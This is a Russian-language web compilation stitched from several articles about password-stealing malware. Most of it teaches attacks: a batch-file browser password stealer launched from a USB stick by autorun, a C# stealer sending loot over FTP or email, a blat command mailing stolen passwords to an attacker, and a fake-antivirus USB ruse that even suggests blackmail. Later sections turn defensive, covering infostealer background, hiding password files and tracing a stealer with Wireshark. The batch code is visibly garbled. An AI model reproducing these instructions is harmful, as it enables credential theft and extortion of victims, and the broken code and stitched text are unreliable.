Как сделать вирусы стиллер
Стиллер паролей для браузеров на Windows
Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.
Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.
Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.
- Не ругается антивирус;
- Скорость работы;
- Простота в доработке;
- Возможность мгновенного запуска;
- Портативность.
- Autorun не работает на Windows 8+;
- Постоянное созданиеудаление autorun.inf;
- Личное присутствие;
- Только для Windows.
Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов
Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.
Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.
Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.
Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.
Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.
Создаём стиллер паролей для браузеров
Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.
Создаём текстовый документ и пишем туда следующий код:
d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %
d0Opera
copy /y coockies.dat %
d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %
d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%
d0/Google”
ATTRIB -R -A -S -H
attrib +h %
Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.
Теперь нужно создать файл autorun.inf со следующей командой:
Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.
Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.
Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.
Есть такой класс программ, призванных получать у пользователя конкретные (или какие угодно) файлы и направлять их специально уполномоченным людям. Конечно, с предварительного письменного согласия упомянутых пользователей! Этот класс программ называют Stealer. Самый яркий их представитель, UFR Stealer имеет симпатичный интерфейс, множество настроек и по какому-то недоразумению детектируется всеми известными антивирусами. А что было бы, если бы хакеры писали подобные программы на С#? Пофантазируем!
Для начала — соберись с духом и обновись наконец на бесплатную Visual Studio Community 2013 :). На дворе 2015 год, и сидеть на старой Visual Studio Express уже не круто. Как поставишь — загляни в раздел Extensions and updates и установи несколько полезных расширений, таких как Resharper или Productivity Power Tools 2013. Для анализа полученных сборок вполне подойдет бесплатный декомпилер dotPeek, это очень хорошая утилита, которая покажет, что там получилось, и может построить солюшен и файл с отладочными символами.
Ставим задачи и определяем требования
Итак, попробуем предположить, как хакеры размышляют на данном этапе. Для них проблема заключается в том, что у пользователя есть файлы, которые интересны не только ему. Возможно, юзер даже и не знает, что они существуют и где точно расположены, но от этого хакерам легче не становится. Надо каким-то образом получить их копию и посмотреть, что внутри, — кто знает, может быть, это именно то, что нужно?
Чтобы своими действиями не беспокоить пользователя, не прерывать его сериалы и не мешать общению в социальных сетях, хакеры добавляют в свои программы определенный функционал. Их программы имеют небольшой размер и молча выполняют свою работу (silent mode). Целевой платформой на сегодняшний день обычно выбирают Windows 7 и более старшие версии. XP — дело хорошее, но она сдает позиции, и, по данным одного известного антивирусного разработчика, ее доля на конец 2015 года составит всего 16–17%.
Проектируем и конструируем
Основная идея этого класса заключается в формировании структуры алгоритма, который уже будет реализован в Google Chrome, ICQ, Skype и так далее.
Да, небольшое дополнение. В данном примере логика работы приложения находится внутри разделяемого класса Form, если хочется дополнительно реализовать консольный или WPF-интерфейс, то ее следует вынести отдельно и подписаться на группу ожидаемых событий. Подробнее про правильную архитектуру можно почитать у Стива Макконнелла (Code complete).
Код под кнопками мог бы быть весьма тривиальным, но, как говорится, не тут-то было. Выдержка из BUILD:
Стандартными средствами пройтись по коллекции активных чекбоксов возможно, но зачем писать так просто, когда есть красивые решения на страницах Stack Overflow? Это и объясняет появление дополнительного пространства имен для подсмотренного метода расширения, где он и расположен (по совету Трея Нэша в книге Accelerated C# 2010). Фишка этого решения также в том, что все классы, реализующие абстракцию, являются вложенными ресурсами приложения (далее показано, как это сделать) и имеют то же имя, что и текст на чекбоксах. Поэтому всего-то нужно пробежаться по всем активным элементам и собирать их имена, попутно добавляя в коллекцию и заменяя метку в классе стаб, //[Add_toList] для добавления в List и //[Class] для определения самих классов. Адрес FTP, пароль, логин и данные для почты реализованы стандартно — получил текст с элемента управления и вставил в стаб.
Задача кнопки Check all сводится к управлению галочками сразу на всех целях. Реализуется это через приватное поле класса Form булева типа и один метод, который принимает это значение в качестве аргумента, применяя его к каждому чекбоксу. На обработчике события считывается значение указанного поля и передается методу, по завершению его работы оно меняется на противоположное.
В первую очередь здесь следует обратить внимание на то, что вся основная работа выполняется с использованием обобщенной коллекции List и абстракции. Все элементы коллекции апкастятся до абстрактного класса, и на их экземплярах вызывается метод DoJob, который проверяет, есть ли искомый файл, и, если ответ да, он пытается его достать. Далее каждый полученный файл помещается в коллекцию Dictionary , в которой хранится имя программы, содержащей файл, и сами данные в виде массива байтов. После обхода всей коллекции List и заполнения Dictionary производится сериализация последнего, затем его шифрование и, наконец, отправка по указанному каналу связи.
В листинге не отображены методы SendViaFtp и SendViaEmail, примеры которых будут показаны далее, метод Encrypt (на самом деле конкретная реализация не имеет значения, выбирается любой симметричный алгоритм), класс AbstractFile и поля класса, которые будут хранить в себе логины, пароли а также ключи шифрования. На этом все, больше ничего интересного и нового в стабе нет.
Метод ToString переопределен для того, чтобы словарь из стаба было удобнее заполнять и анализировать при получении. Другие классы по поиску файлов выглядят идентично, разница лишь в пути и, возможно, наличии дополнительных проверок в зависимости от типа хранения. Чтобы не забыть, какие методы надо реализовать от унаследованного класса, или просто сократить время клавиатурного ввода, на AbstractFile можно нажать мышкой и подождать появления подсказки implement abstract class, которая автоматически построит нужный код.
Узнать, сколько всего можно дописать в программе без особых усилий и как сэкономить кучу времени на личных исследованиях, хакерам помогает ресурс Password Secrets of Popular Windows Applications, на нем заботливо выложена информация о расположении интересующих файлов и утилит для анализа.
Как видно на картинке главной формы приложения, в этой части будет обсуждаться пример реализации отправки по FTP и email. Начнем с первого. В конструкторе FtpWebRequest задается URL из текстбокса главной формы, который был вставлен на свою метку в стабе. К нему также добавляется имя передаваемого файла, в качестве которого используется Environment.UserName в связке с Path.GetRandomFileName. Это сделано с той целью, чтобы пользователи с одинаковыми именами не перезатирали друг друга. Метод транспортировки устанавливается в WebRequestMethods.Ftp.UploadFile, и указывается NetworkCredential(_ftpUser, _ftpPass) по аналогии с URL. Работоспособность метода проверяют на локальном FTP, для этого был использован smallftpd 1.0.3.
Заключение
Вы сейчас скажите, ой-ай, чо херню несёшь, а херню-ли, рассказываю как сделать:
Blat это маленькая open source консольная програмулька под Windows, которая позволяет отправлять e-Mail по SMTP протоколу из командной строки.
3)Архив распаковываем в ту же папку с MPR:
Создаем файл 1.bat открываем с помощью Блокнота и вводим содержимое:
Изменяем данные на свои.
Открываем её . в batch file вводим файл 1.bat .
В дереве visibility Ставим галку на второй чексбокс.
5)Заходим на вкладку include нажимаем на кнопку add и выбераем файлы
И нажимаем Compile. Открываем файл и смотрим почту.
Может ещё что есть ?
Важно, чтобы программа поддерживала команды через батник:
mpr.exe /export - делает экспорт паролей;
ren *.mpf pass.mpf - переименовывает в pass.mpf
blat . exe - bоdу PassReg - to кому отправлять @ yandex . ru - attach pass . mpf - Строчка отправляет нам пароли pass.mpf !
Кстати такой функционал не проблема реализовать обычным батником без всякого MPR, вот например гугл-хром, хранит пароли в C:\Users\SomeUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
Тырити файл Login Data батником и всё, файлзилла хранит здесь:C:\Users\Ваше имя\AppData\Roaming\FileZilla\recentservers.xml
Данный код вытаскивает пароли из файлзилла, если есть нормальная защита, то должны получить запрет на доступ к папке Users, вот так:
Блин очередное головотяпство, во первых в файлзилла пароли могут-быть и здесь:sitemanager.xml
А во вторых не важная какая у вас защита пробить можно вводя без кавычик:“Pass User Host”.
Получаем пароль, никто даже не пискнул, ну OA конечно среагировал, задал алерт, ну и пох.:
А вот теперь бонус, как стырить все пароли на флешку:
Идея вот в чём, приходите к красивой блондинке якобы проверить комп на вирусы, далее вставляет флешку с кашмарский антивирус, на флешке разумеется будет подготовленный софт, какой смотри ниже, короче когда флешка будет подключена, запуститься стиллер вместе со сканером кашмарского (Он запуститься для отвода глаз) и всё, все пароли у нас, потом заходим на почту блондинки и читаем её любовную переписку, а потом можно её шантажировать, если она откажется вас ещё пригласить.
Итак забыл самое главное сказать, как-же это всё сделать, а очень просто:
1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\
2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe
3. В корне флешки создаем autorun.inf со следующим содержанием:
Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.
4. Создаем батник launch.bat:
Рассмотрим команды батника поподробнее:
echo off – запрет на вывод в окно CMD результатов выполнения
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt
Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.
start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского
Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.
Весь софт во вложении, пароль:111
Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
Дата публикации: 03.01.2019 2019-01-03
Статья просмотрена: 1175 раз
Ключевые слова: вредоносный вирус, способ защиты, электронный ресурс, зараженный компьютер, Интернет.
Компьютерный вирус — это программа, способная создавать свои копии, внедрять их в различные объекты или ресурсы компьютерных систем, сетей и производить определенные действия без ведома пользователя.
Свое название компьютерный вирус получил за некоторое сходство с биологическим вирусом (например, в зараженной программе самовоспроизводится другая программа — вирус, а инфицированная программа может длительное время работать без ошибок, как в стадии инкубации).
Программа, внутри которой находится вирус, называется зараженной программой.
Когда инфицированная программа начинает работу, то сначала управление получает вирус. Вирус заражает другие программы, а также выполняет запланированные деструктивные действия. Для маскировки своих действий вирус активизируется не всегда, а лишь при выполнении определенных условий (истечение некоторого времени, выполнение определенного числа операций, наступления некоторой даты или дня недели и т. д.). [1]
После того как вирус выполнит нужные ему действия, он передает управление той программе, в которой он находится. Внешне зараженная программа может работать так же, как и обычная программа [2].
В мире распространяются тысячи самых различных вирусов, однако не все из них широко известны. Вирус становится известен только тогда, когда причиненный им ущерб достигнет определенной денежной величины. Несколько лет назад в Интернете начали появляться вирусы, разрушительные последствия которых исчислялись миллиардами долларов. Так образовался клуб вирусов-миллиардеров, в котором на данный момент их насчитывается около десятка. Все из них нанесли ущерб мировой экономике больше, чем на 1 млрд. долларов [3].
Методы исследования: поисковый, анализа и синтеза, обобщения и систематизации полученных данных.
Практическая значимость исследования определяется возможностью использования материалов данной работы для защиты персонального компьютера (далее по тексту — ПК), мобильных телефонов и других устройств, которые работают с помощью сети интернет с целью их защиты их от вредоносных вирусов.
Info stealers могут использовать множество методов сбора данных. Наиболее распространенными из них являются:
– зависание браузеров (а иногда и других приложений) и кражи учетных данных, которые набираются пользователем;
– использование скриптов веб-инъекций, которые добавляют дополнительные поля в веб-формы и отправляют информацию от них на сервер, принадлежащий злоумышленнику;
– захват формы (поиск определенных открытых окон и похищение их содержимого);
– с помощью раскладки клавиатуры;
– кражи паролей, сохраненных в системе, и файлов cookie.
Современные похитители обычно являются частями бот-сетей.
Иногда цель атаки и связанные с ней события, настраиваются удаленно командой, отправленной с сервера Command and Control (C & C).
Возраст похитителей информации начался с выпуска ZeuS в 2006 году. Это был продвинутый троян, ориентированный на учетные данные онлайн-банковских услуг. После того, как код ZeuS просочился, многие его производные начали появляться и популяризировать этот тип вредоносного ПО.
В настоящее время у большинства агентов ботнета есть некоторые особенности кражи информации, даже если это не главная их цель.
Информация похитителей обычно связана со следующими типами вредоносных программ, таких как:
– Загружатели / Trojan Droppers — вирус инфекционного компьютера, который подтверждает себя на помеченном компьютере, используя преимущества ненадежных параметров безопасности и незащищенной сети.
– Троян — вредоносная компьютерная программа, которая используется для заражения системы целевого компьютера, и приводит к вредоносной активности на нем. Как правило, такие программы используются для похищения личной информации, распространения других вирусов или просто нарушения производительности компьютера. Кроме того, хакеры могут использовать их для получения несанкционированного удаленного доступа к зараженным компьютерам, заражения файлов, и повреждения системы. Как только троянский конь попадает в компьютер, он начинает скрываться от жертвы. Трояны очень похожи на обычные вирусы, поэтому, их довольно трудно обнаружить.
– Ботнет — компьютерная сеть. состостоящая из некоторого количества хостов с запущенными ботами — автономным программным обеспечением. Чаще всего бот в составе ботнета является программой, скрытно устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять некие действия с использованием ресурсов заряженного компьютера. Обычно используются для нелегальной или неодобряемой деятельности — рассылки спама, перебора паролей на удалённой системе, атак на отказ в обслуживании (DoS- и DDoS-атаки). Боты, как таковые, не являются вирусами. Они представляют собой набор программного обеспечения, который может состоять из вирусов, брандмауэров, программ для удаленного управления компьютером. А также инструментов для скрытия от операционной системы.
Они представлены семействами вредоносных программ, такими как:
– Зевс — троянская программа нового типа, разработана группой хакеров в 2007 году, и предназначенная для атаки серверов и перехвата данных. Ущерб от данной троянской программы огромный.
– Tinba — разрушает важные системные файлы, которые гарантируют бесперебойное функционирование ПК и препятствуют нормальной работе устройства. Он отключает работу всех установленных мер безопасности, включая антивирусные инструменты и брандмауэры Windows, и открывает бэкдоры для других интернет-угроз.
– Ботнет Нейтрино — компьютерная сеть, состоящая из некоторого количества хостов с запущенными ботами — автономным программным обеспечением. Чаще всего бот в составе ботнета является программой, скрытно устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять некие действия с использованием ресурсов заражённого компьютера.
Значение вредоносных программных обеспечений
Раннее обнаружение имеет решающее значение для этих видов вредоносного ПО. Любая задержка в обнаружении этой угрозы может привести к тому, что важные учетные записи будут скомпрометированы.
Последствия очень серьезны для похищенных паролей, так как информация похитителей опасна для всех пользователей зараженной машины. Поэтому очень важно иметь защиту от вредоносных программ хорошего качества, которая не позволит установить вредоносное ПО.
Последствия от вредоносных стиллеров влекут за собой:
– утечку конфиденциальной информации;
– похищение денежных средств со счетов как граждан, так и банков и их перевод на счета похитителей.
Украденные учетные записи электронной почты могут использоваться в серверном направлении для отправки спама, а украденная учетная запись SSH может использоваться как прокси-сервер для атак, совершаемых кибер-преступниками.
Прежде всего, следует взять за привычку, соблюдать безопасность при посещении веб-сайтов и не открывать неизвестные вложения. Однако в некоторых случаях этого недостаточно. Наборы наложения могут все же устанавливать вредоносное ПО на уязвимую машину, даже без какого-либо взаимодействия. Именно поэтому важно иметь качественное антивирусное ПО.
– во-первых, его не видят антивирусы;
– во-вторых, этот stealer написан на java поэтому для его работы у жертвы должно быть установлено соответствующие ПО (java runtime). Все действия будут выполняться на операционной системе kalilinux.
Так как Стиллер скомпилировался в формате java нам предлагают создать exe файл, жмём Y.
Затем нужно скрыть стиллер, например, использовать метод bad USB или внедрить его в программу. В дальнейшем если жертва откроет программу, стиллер начнёт действовать самостоятельно.
Во-первых, никогда не следует открывать файлы из ненадёжных источников.
Во-вторых, следует установить хороший антивирус, но и он не всегда может помочь.
Скрипт деактивации стиллера:
В-четвёртых, если пользователь все-таки подозревает, что компьютер заражен кражей информации, он должен выполнить полную проверку системы с помощью автоматических средств защиты от вредоносных программ. Удаление вредоносного ПО недостаточно. Крайне важно немедленно изменить все пароли.
Стилер (от английского to steal, воровать) — определенный класс троянов (малвари, вирусов - как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их "автору".
Стилер, пользуясь наивностью чукотских программистов, залазит в хранилища часто используемых программ и нагло тырит оттуда все логины, пароли и т.п. Следующий, он же последний этап работы программ данного класса — отправка вкусняшек злоумышленнику. Вот как-то так всё это и работает.
Из всего вышеописанного следует один громадный минус подобного софта: если пароли не сохранены, то парнишке-злодею стилер ничего не отправит.
Теперь о основных фичах стилеров. Чаще всего эти троянчеги воруют сохраненные пароли из браузеров (акки, банки и т.п.), FTP-клиентов и IM-клиентов (шестизнаки и т.п.). Отправка паролей может происходить в открытую - т.е. уже расшифрованные голые пароли передаются на гейт или еще куда, или же в зашифрованном виде. В идеале — в таком виде, чтобы никто кроме нашего парнишки не смог бы добраться до украденных паролей.
Логи (ну т.е. сразу пачка паролей от пользователя) в большинстве случаев отправляются злодею на FTP-сервер, на гейт или на почту.
XP -
C:\Documents and Settings\Username\Local Settings\Application dat\Google\Chrome\User dat\Default
в файле “Web dat”
Vista -
C:\Users\Username\Appdat\Local\Google\Chrome\User dat\Default
в файле “Web dat”
Firefox :
Пассы в Firefox хранятся в файле "signons.txt" или "signons2.txt" или "signons3.txt".
Который лежит тут : [Windows Profil]\Application dat\Mozilla\Firefox\Profiles\
Opera :
[Windows Profil]\Application dat\Opera\Opera\
в файле "wand.dat"
но как же их защитить от стиллера ?
вы удивитесь как просто это сделать
вам надо только поменять имя или путь где лежат эти файлы
Для того чтоб поменять имя или путь этих фалов надо открыть настройки браузера
как это делается читаем ниже
Для Firefox
Открываем браузер
В поле для url пишем about:config и открываем
Если это ваш первый вход то браузер предупредить вас чтоб вы были осторожны
Вам откроется окно где куча настроек
На верху в поле Поиск пишем signon и даем поиск
Поиск найдет 3 файлов “signon.txt” “signon2.txt” “signon3.txt”
Два раза кликаем по этим файлом и меняем имя
Но не забудьте , если вы "signon.txt" поменяли на "pass.txt" то "signon2.txt" должны поменять на "pass2.txt"
Все после этого перезапустите браузер
ВАЖНО! Перед тем как провернуть такую фишку не забудьте удалить все пароли из файлов “signon.txt” “signon2.txt” “signon3.txt”
Как выше уже отметил пассы от Оперы хранятся в файле "wand.dat"
Но мы не сможем поменять имя файла, вместо этого мы поменяем место хранение файла
Открываем браузер
В поле для url пишем opera:config и открываем
тут тоже в поле поиск пишем wand.dat
в оrне появляется наш файл и путь где он лежит
нажимаем на обзор и открывается окно где лежит файл
в этом же окне копируем wand.dat а потом переходим назад директорией выше
там создаем новую папку
открываем эту папку и сохраняем файл wand.dat (все эти операции мы делаем в окне которая открылась)
И все выбираем этот файл и нажимаем "Ок"
и все файл с пассами теперь будет лежать там куда мы его скопировали
Старый файл уже можно удалять
Вот и все. Уже стиллер не сможет украсть ваши пассы. Так как мы поменяли место хранение файла
В этом браузере мы несможем поменять что - то
Но это незначит что мы несможем зашитить свои пассы
Для этого есть спец. программа "Chromeplus"
Но конечно для всего есть альтернатива
Для тех кто нехочет копаться в настройках есть программа "Kasperky Password Manager"
Устанавливаем и защищаемся
Не всё так плохо, как кажется на первый взгляд, ведь у нас есть Wireshark
На примере UFR
Нам понядобятся:
- Билд стилера. Его ловим на любом хэк-форуме, обычно его впаривают под видом неибаццо полезной тулзы или кряка.
- Wireshark (
)
Первое, что надо сделать — убить или хотя бы за'suspend-ить все процессы, которые юзают сеть. Так будет проще найти нужные данные в тоннах хуйни. Запускаем Wireshark и настраиваем интерфейс для сниффинга: Capture -> Interfaces. Выбираем тот, который используется у Вас — в колонке Packets будет наибольшее число. Жмем "Start", тем самым начиная сниффинг.
Запускаем билд стилера (всё на виртуалке, и никак иначе!) и контролируем Process Explorer'ом (на самый худой и короткоствольный конец — Диспетчером задач) его работу, ожидаем завершения.
Переходим в Wireshark и жмем Capture -> Stop, т.е. завершаем сниффинг. Теперь у нас есть дамп сетевой активности всей системы за то время, пока работал билд стилера. Осталось найти нужные данные.
Для начала пробуем засечь FTP-сервер, вдруг стилер именно таким образом отправляет отчет с паролями. Для фильтрации в Wireshark'е есть всё необходимое — вбиваем в поле фильтрации (оно находится прямо над списком пойманных пакетов) слово "ftp" и жмем "Enter":
веб-морды, заходим в почту и меняем пароль (чтоб поднасрать, ибо нехуй!).
Если же сниффинг ничего не дал, значит в стилере включена защита от подобной хуиты. Можно попробовать сменить имя EXE'шника вайршарка, или изменить заголовок окна, но не факт что поможет.
И да, не надеемся на ваш антивирус, зловред легко криптануть(ну если его не школьник делал, то он обязательно закриптован)
И если вы уверены что стиллер прикреплён к рабочей проге(которая вам просто необходима и нигде её больше не взять), то запускайте просто прогу на виртуалке или в песочнице(SandBoxie).
От меня тут мало, просто собрал всю инфу что нашёл, и которая реально помогает.
Если что-то забыл, говорите, добавлю.
Читайте также:
